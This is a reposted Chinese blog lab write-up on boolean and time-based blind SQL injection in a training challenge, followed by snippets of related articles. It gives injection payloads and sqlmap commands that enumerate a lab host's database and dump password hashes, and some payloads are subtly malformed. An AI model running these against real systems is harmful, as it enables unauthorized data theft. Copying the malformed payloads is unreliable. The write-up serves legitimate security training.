SQL注入之布尔盲注漏洞实战

最新推荐文章于 2023-08-21 15:03:40 发布
最新推荐文章于 2023-08-21 15:03:40 发布
阅读量488 收藏
点赞数
分类专栏: 安全 文章标签: 网络安全 安全
原文链接:https://bbs.linsansui.cn/thread-13-1-1.html
版权

SQL注入之布尔盲注漏洞实战

实训目标
1、掌握SQL注入原理;
2、了解MySQL的数据结构;
3、了解布尔盲注相关语句;
解题方向
1、通过布尔盲注得到后台账号,从而获得key。
经过测试,确定注入点在维护界面的URL链接的id参数中,但是没有报错回显,故而要通过盲注来进行判断。
手工注入:
利用布尔盲注,来进行爆库:
首先是爆数据库名:
payload1(布尔盲注):?id=1 orif(ascii(substr(database(),1,1))>1,1,0),该语句表示如果当前数据库首字母ASCII值大于1的话,条件语句为1,否则为0。
payload2(延时盲注):?id=1 orif(ascii(substr(database(),sleep(5),1))>1,1,0),该语句表示如果当前数据库首字母ASCII值大于1的话,执行5s的延时函数,否则为0。
得到正常的页面,说明上面的判断语句是正确的,可以写脚本来进行爆库,这样效率会高很多
手工盲注的基本操作就是这样,接下来就是爆表名,列名以及字段了。
sqlmap注入:
直接把维护页面的URL丢进sqlmap中,检测参数id的可注入性。
爆库名:

sqlmap.py -u "http://219.153.49.228:43837/new_list.php?id=1" --dbs --batch

可以再爆一下当前数据库,得到当前数据库为stormgroup。
爆表名:

sqlmap.py -u "http://219.153.49.228:43837/new_list.php?id=1" -D stormgroup --tables –batch

复制代码

sqlmap.py -u "http://219.153.49.228:43837/new_list.php?id=1" -D stormgroup -T member --columns --batch

复制代码
爆字段:

sqlmap.py -u "http://219.153.49.228:43837/new_list.php?id=1" -D stormgroup -T member –C password --dump --batch

得到的密码是经过MD5加密的,MD5在线进行解密一下即可得到真实的密码
登录即可得到flag

转载自:林三岁网络安全实验室
转载请注明出处:https://bbs.linsansui.cn/forum.php?mod=viewthread&tid=10&extra=page%3D1

林三岁网络安全实验室
关注
专栏目录
网络安全自学教程》- SQL注入布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 4170
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
网络安全自学教程》- SQL注入之时间盲注原理+步骤+实战操作
最新发布
wangyuxiang946的博客
05-21 4097
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
SQL注入实战盲注篇(布尔、时间盲注
m0_51428325的博客
11-16 4294
首先还是写一下核心的语句吧。 information_schema schemata(schema_name) tables(table_schema,table_name) columns(table_schema,table_name,column_name) select schema_name from information_schema.schemata; select table_name from information_schema.tables where table_
[MYSQL手工注入](2)基于布尔的SQL盲注实战
baguangman5501的博客
07-16 475
0x02 MYSQL 手工注入实战——基于布尔的SQL盲注 前言,之前有对MYSQL基于报错的手工注入进行过介绍,但今天的实验环境,并不是基于报错的SQL注入,而是一个基于布尔的SQL盲注测试流程。 这个网站的SQL注入漏洞,大概1年前就有人发现过了,我也是在找环境的过程中,突然发现的。这个网站是存在WAF的(WTS-WAF) 但是这个WAF并不是很管用,只是把空格与某些重要函数放到了黑...
SQL布尔盲注漏洞
weixin_45007073的博客
02-19 590
原理 目前常用的SQL盲注主要有以下两类: 基于布尔盲注: 当页面没有回显位、不会输出SQL语句报错信息时,通过返回页面响应的正常或不正常的情况来进行注入。 基于时间的盲注: 当页面没有回显位、不会输出SQL语句报错信息时,不论SQL语句的执行结果对错都返回一样的页面时,通过页面的响应时间进行注入。 缺点: 两种盲注方式都需要耗费大量的精力去进行测试,因此在渗透测试过程中常使用工具(sqlmap)或脚本来代替手工操作。 以下我们将使用sqli-labs-Less8靶场进行操作和演示,注入成功则会显示"
SQL注入漏洞测试(布尔盲注)
qq_36933272的博客
08-31 554
1、点入维护通知 2、用sqlmap依次跑出数据库名,表名,列名,最后在name和password行中获取指定值为mozhe和一串md5加密的密码,将密码解密,登录进入页面得到key 得到数据库名stormgroup 得到表名member 得到列name,password 获取name,password行的值 登陆,得到key ...
墨者学院-SQL注入漏洞测试(布尔盲注)
臭nana的博客
05-29 1155
两种方法 一种是用穿山甲跑,直接得到用户名密码。 ​一种是使用python脚本跑,使用sqlmap也行,下面是我自己写的脚本 跑库名 (二分法查找)得到stormgroup importstring importrequests url="http://219.153.49.228:47151/new_list.php?id=1%s" payload="andascii(su...
SQL注入漏洞-04】布尔盲注靶场实战
cc
02-03 6637
当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔盲注。 利用页面返回的布尔类型状态,正常或者不正常; 我们输入的语句让页面呈现出两种状态,相当于true和false,根据这两种状态可以判断我们输入的语句是否查询成功。布尔盲注就是根据这两种状态,来反推我们输入的条件是真还是假。以sqli-labs-masterless-8关为例
Sql漏洞注入之盲注
Matheus的博客
07-22 537
盲注Boolean盲注、时间盲注布尔Boolean)盲注 1 布尔注入 有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注盲注根据展现方式,分为boolean型盲注和时间型盲注Boolean是基于真假的判断(true or false); 不管输入什么,结果都只返回真或假两种情况; 通过and 1=1和and 1=2可以发现注入点。 Boolean型盲注的关键在于通过表达式结果与已知值进行比对,根据比对结果 判断正确与否。 2 布尔盲注
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
1. sqlmap是一款强大的自动化SQL注入工具,它可以自动识别SQL注入漏洞并利用它们。在本实验中,我们将用sqlmap对DVWA(Damn Vulnerable Web Application)靶场进行测试。 2. 首先,我们需要获取靶机上的数据库信息...
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
记一次布尔盲注漏洞挖掘与分析
末初的CSDN博客
08-21 592
记一次布尔盲注挖掘与分析
SQL注入-布尔盲注
qq_65240014的博客
07-26 613
关于sql注入的略微进阶一点的文章,介绍关于bool盲注的方法
sql注入学习笔记(三)布尔盲注
w17691058648x的博客
03-13 1074
布尔盲注是由于页面提交数据在与数据交互是完全没有在页面上出现回显数据,只会出现数据提交正确和错误俩种不同页面(报错型至少语法错误会回显错误在页面上)或者无法使用联合查询。 例如:一个人不说话,如果你说对了他就点头,如果你说错了他就摇头。理解以下场景: 菜鸟:“大佬,你是不姓张?” 不说话的大佬:摇头ing 菜鸟:“我知道了,大佬你姓王是不是?” 不说话的大佬:欣慰的点头ing...
sqlserver数据库布尔盲注_sql注入入门之mysql布尔盲注
weixin_34393451的博客
12-24 444
1,实例 mysql 盲注点,如下,虽然这并不是个标标准准的盲注点,但并不影响我们用盲注的方式来获取数据,以后遇到纯正的盲注点,我们再补充:2,一阵单引号过后,目标数据库如期报错,对于mysql来讲,一般出现这情况,百分之九十九可以确定这就是个正儿八经的注入点3,尝试闭合,还是前面的问题,不要一眼看到数字就认定它是个数字型注入,比如该实例就又是个字符型注入,我们只需闭合前面的单引号注释掉后面的语句...
mysql注入入门_sql注入入门之mysql布尔盲注
weixin_31727797的博客
02-19 170
1,实例 mysql 盲注点,如下,虽然这并不是个标标准准的盲注点,但并不影响我们用盲注的方式来获取1、http://www.vuln.com/wexpage.php?id=212,一阵单引号过后,目标1、http://www.vuln.com/wexpage.php?id=21'3,尝试闭合,还是前面的问题,不要一眼看到数字就认定它是个数字型注入,比如该实例就又是个字符型注入,我们只需闭合前面的...
mysql bool盲注_Mysql 高级盲注布尔盲注【sqli blind】
weixin_39971132的博客
01-18 175
什么是盲注 [sqli blind]?盲注通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在注入,因为在页面上没有任何回显,此时再想利用常规的union曝数据字段可能就不大现实了,于是后来就被人发现了盲注这种技巧,关于盲注的常用类型,主要有三种,基于时间,布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布尔盲注做详细说明,关于其它的技巧,后续还会再单...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值